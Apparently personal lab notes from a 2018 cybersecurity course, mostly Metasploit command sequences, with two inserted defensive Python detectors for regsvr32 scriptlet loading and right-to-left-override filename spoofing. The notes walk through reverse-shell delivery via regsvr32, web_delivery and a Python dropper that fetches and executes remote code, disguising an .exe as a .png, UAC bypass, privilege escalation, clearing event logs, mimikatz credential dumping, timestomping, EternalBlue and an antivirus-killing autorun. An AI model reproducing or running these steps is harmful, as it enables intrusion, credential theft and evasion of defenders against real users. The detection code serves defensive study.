rdesktop -g 1280x1024 172.16.50.96
=== || === || === || === || === || === ||
|| 03.12.2018 week 3 in cyber ||
=== || === || === || === || === || === ||
OSF forensics - tool for forensics
=== || === || === || === || === || === ||
|| 05.12.2018 ||
=== || === || === || === || === || === ||
I was not there
=== || === || === || === || === || === ||
|| 07.12.2018 ||
=== || === || === || === || === || === ||
I was not there
=== || === || === || === || === || === ||
|| 10.12.2018 ||
=== || === || === || === || === || === ||
to set up reverse-shell malware via:
regsvr32 /s /n /u /i:http://172.16.65.141:8080/.sct scrobj.dll
task scheduler
run persistence (in metasploit)
create malware in the Go language
right-to-left unicode
jpg to ico # online convert
change the file icon to the icon file created for the malware
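The regsvr32 line above is the "scriptlet" technique: a signed Windows binary is pointed at a remote .sct file with /i:URL and scrobj.dll. An added defensive example, not from the original notes, that flags such command lines in process-creation logs (the sample log lines are constructed; the first mirrors the one in the notes):

```python
# Added example (not part of the original notes): detect regsvr32 being used
# to load a remote scriptlet (regsvr32 /s /n /u /i:<URL> scrobj.dll).
import re

# Constructed sample process-creation command lines.
SAMPLE_LOGS = [
    "regsvr32 /s /n /u /i:http://172.16.65.141:8080/.sct scrobj.dll",
    "regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll",
    'REGSVR32.EXE /u /n /i:https://example.invalid/payload.sct SCROBJ.DLL',
    "notepad.exe C:\\Users\\Lab\\notes.txt",
]

# /i:<URL> install argument pointing at a remote resource.
_REMOTE_INSTALL = re.compile(r"^/i:(https?|ftp)://", re.IGNORECASE)


def _basename(token: str) -> str:
    """Lower-cased file name of a (possibly quoted, possibly full) path."""
    return token.strip('"').lower().rsplit("\\", 1)[-1]


def is_regsvr32_scriptlet(cmdline: str) -> bool:
    """True when regsvr32 is given a remote /i: argument and scrobj.dll."""
    argv = cmdline.split()
    if not argv or _basename(argv[0]) not in ("regsvr32", "regsvr32.exe"):
        return False
    remote = any(_REMOTE_INSTALL.match(a.strip('"')) for a in argv[1:])
    scrobj = any(_basename(a) == "scrobj.dll" for a in argv[1:])
    return remote and scrobj


def scan(lines):
    """Return the log lines that match the scriptlet pattern."""
    return [line for line in lines if is_regsvr32_scriptlet(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print("ALERT regsvr32 remote scriptlet:", hit)
```

The registration flags (/s, /n, /u) vary between samples, so the check keys on the remote /i: argument plus scrobj.dll rather than the exact flag set.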
installing python in windows:
download .exe or .msi
install
set up variables in windows:
in System Properties,
Advanced, Environment Variables
System variables, Path (;C:\Python27)
install pip:
cd C:\Python27\Scripts
pip.exe install pyinstaller | dir | check that pyinstaller is there
set up variables in windows:
in System Properties,
Advanced, Environment Variables
System variables, edit variable value: ;C:\Python27\;C:\Python27\Scripts
cd C:\Users\Lab\Desktop
pyinstaller --onefile mlw.py --icon img.ico
copy the right-to-left override symbol from Character Map
rename mlw.exe to mlwgnp.exe, then paste the character in front of png.exe # it is displayed as mlwexe.png
C:/python2.7\Tools\scripts> --ico
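The rename step above relies on the right-to-left override character (U+202E): the raw name mlw + U+202E + gnp.exe is displayed as mlwexe.png while Windows still runs it as an .exe. An added defensive example, not from the original notes, that reports the displayed name, the real extension and whether they disagree (sample names are constructed; the first reproduces the trick from the notes):

```python
# Added example (not part of the original notes): spot file names whose
# displayed extension differs from the real one because of bidi controls.

# Unicode bidirectional control characters that can reorder displayed text.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE


def displayed_name(name: str) -> str:
    """Approximate what a file browser shows: everything after the first
    RLO is rendered reversed up to the end of the string."""
    if RLO not in name:
        return name
    head, _, tail = name.partition(RLO)
    return head + tail[::-1]


def _extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def real_extension(name: str) -> str:
    """Extension the OS actually uses: last '.' of the raw name, controls removed."""
    return _extension("".join(c for c in name if c not in BIDI_CONTROLS))


def check_filename(name: str) -> dict:
    """Describe the name and flag it when controls hide the real extension."""
    controls = [f"U+{ord(c):04X}" for c in name if c in BIDI_CONTROLS]
    shown = displayed_name(name)
    return {
        "raw": name,
        "bidi_controls": controls,
        "displayed_as": shown,
        "real_extension": real_extension(name),
        "displayed_extension": _extension(shown),
        "suspicious": bool(controls) and real_extension(name) != _extension(shown),
    }


# Constructed samples: the spoofed name from the notes and a benign one.
SAMPLES = ["mlw\u202egnp.exe", "report.png"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_filename(sample))
```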
msf > use exploit/multi/script/web_delivery
>show targets
> set target 0
> set payload python/meterpreter/reverse_tcp
> set lhost 172.16.65.141
> set uripath /
> exploit
in a new terminal
../ # to execute
gives us a session :)
edit mlw.py
import sys
import urllib2
r=urllib2.urlopen("http://172.16.60.99:8080/")
exec(r.read())
to transfer to windows: python -m SimpleHTTPServer 80
C:>python mlw.py # gives you a session
##now compile to exe
c:>pyinstaller --onefile mlw.py
wget http://172.16.60.99:8080
echo "<paste content of index.html>" | base64 -d
copy content of script found
nano mlw2.py / paste script here
python mlw2.py / gives you a session
cp to /var/www
copy to windows
pyinstaller --onefile mlw2.py #from location where file is downloaded
cd dist
mlw2.exe # to execute ## error when executed on windows, script problem
fuser -k 80/tcp
msf > use exploit/multi/script/web_delivery
>show targets
> set target 3
> set lhost 172.16.65.141
> set uripath /
> set payload windows/meterpreter/reverse_tcp
> exploit
sessions
sessions -i
getuid
run persistence --help
> use exploit/multi/handler
=== || === || === || === || === || === ||
|| 12.12.2018 ||
=== || === || === || === || === || === ||
## getting a session with metasploit via PHP
use multi/script/web_delivery
show targets
set target 1
set lhost xx
set payload php/meterpreter/reverse_tcp
set uripath /
exploit ##generate some output string
in a new terminal execute
php -d "script"
the session comes in :)
## debug what is happening
**single stage attack
nano info.txt
paste script
wget http://172.16.50.161:8080/
cat index.html
mv index.html index.php
firefox http://127.0.0.1/
the session comes in :)
sessions -i
sessions -k 2
==============================
## getting a session with metasploit via PSH
set target 2
show options
set payload windows/meterpreter/reverse_tcp
show option
jobs -k
exploit / generates a link
nano file / paste the link
nano index.html /paste the url
browse 172.16.50.161 /copy the link
in cmd paste the link
:) gives you a session
sessions -i x
getuid
> run post/windows/manage/enable_rdp
> run post/windows/manage/ many options
========================================
## payload_inject ## duplicates an existing session
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lport xx
> set lhost xx
> exploit -j #silent
meterpreter> background
> run post/windows/manage/payload_inject
> set payload windows/meterpreter/reverse_tcp
> set lport xx
> set lhost xx
> set session x
> exploit
:) duplicates the session
meterpreter> getuid
meterpreter> shell
meterpreter> background
> use exploit/windows/local/bypassuac
> set session 1
> exploit
> set lport xx
> show advanced
> exploit
:) gives you a session
meterpreter> getuid
meterpreter> getsystem
meterpreter> getuid
meterpreter> show_mount
meterpreter> ps # process list
## clearing the logs and importance of logs
meterpreter> clearev # clear logs
## reading from memory, read live credentials
meterpreter> load kiwi ## explore the tool, similar to mimikatz
meterpreter> lsa_dump_sam
meterpreter> load mimikatz
## importance of file access time and file modification time
meterpreter> timestomp nc.exe ## find files recently accessed; it modifies the access time
** SIEM analysis
** malware analysis
** behavior analysis
## ask injection
meterpreter>
> use exploit/windows/local/ask
>set lhost
>set lport
>exploit
meterpreter> getuid
meterpreter> getsystem
>exploit
========================================
##Unicorn.py
python unicorn.py windows/meterpreter/reverse_tcp 172.16.59.161 666 macro
msfconsole -r unicorn.rc
cat powershell_attack.txt
=== || === || === || === || === || === ||
|| 14.12.2018 ||
=== || === || === || === || === || === ||
## malware of the future
## AI
## polymorphic malware, to read during holiday
## autorun script
resource ## read commands from a file in msfconsole
eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost IP
set lport port
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set EXITFUNC thread
set LHOST localhost
set LPORT 4445
set AutoRunScript post/windows/manage/killav
exploit -j
msf > use exploit/multi/script/web_delivery
> set TARGET 3
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST
> show options
> exploit
sessions -c "command"
sessions -c "whoami"